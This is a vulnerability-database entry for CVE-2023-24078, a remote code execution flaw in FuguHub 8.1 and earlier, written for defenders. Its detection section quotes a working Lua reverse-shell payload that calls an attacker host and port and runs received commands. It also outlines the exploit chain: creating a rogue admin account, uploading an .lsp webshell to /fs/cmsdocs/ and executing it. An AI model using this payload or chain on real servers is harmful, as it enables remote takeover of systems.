CVE-2023-24078
published 2023-02-17CVE-2023-24078: Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.
PriorityP274high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
53.24%
98.8th percentile
Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realtimelogic | fuguhub | <= 8.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandlocal host, port = "{LHOST}", {LPORT}
local socket = require("socket")
local tcp = socket.tcp()
local io = require("io") tcp:connect(host, port);
while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()↗
- →Monitor for unauthenticated or authenticated POST requests to /Config-Wizard/wizard/SetAdmin.lsp, which the exploit uses to create a rogue admin account if none exists. ↗
- →Detect POST requests uploading files with Content-Type application/octet-stream to /fs/cmsdocs/, particularly files with a .lsp extension, which are server-side Lua script pages executed by FuguHub. ↗
- →Alert on HTTP GET requests to /rev.lsp (or any newly uploaded .lsp file under /fs/cmsdocs/) immediately following a file upload, indicating webshell execution. ↗
- →Look for Lua reverse-shell patterns in uploaded files: use of socket.tcp(), io.popen(), and tcp:receive()/tcp:send() loops, which are characteristic of the exploit payload. ↗
- →Monitor for POST requests to /rtl/protected/wfslinks.lsp with form fields ba_username and ba_password, used by the exploit to authenticate before staging the upload. ↗
- ·The exploit checks whether an admin account already exists via /Config-Wizard/wizard/SetAdmin.lsp; if the page returns 'User database already saved', it skips account creation and proceeds directly to login. Hardened deployments with existing admin accounts are still vulnerable to the upload stage. ↗
- ·The file server path used for upload defaults to /fs/cmsdocs/ but the exploit notes it searches for a valid file server link, implying the path prefix (e.g., 'fs') may vary per deployment. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2023-02-17
Published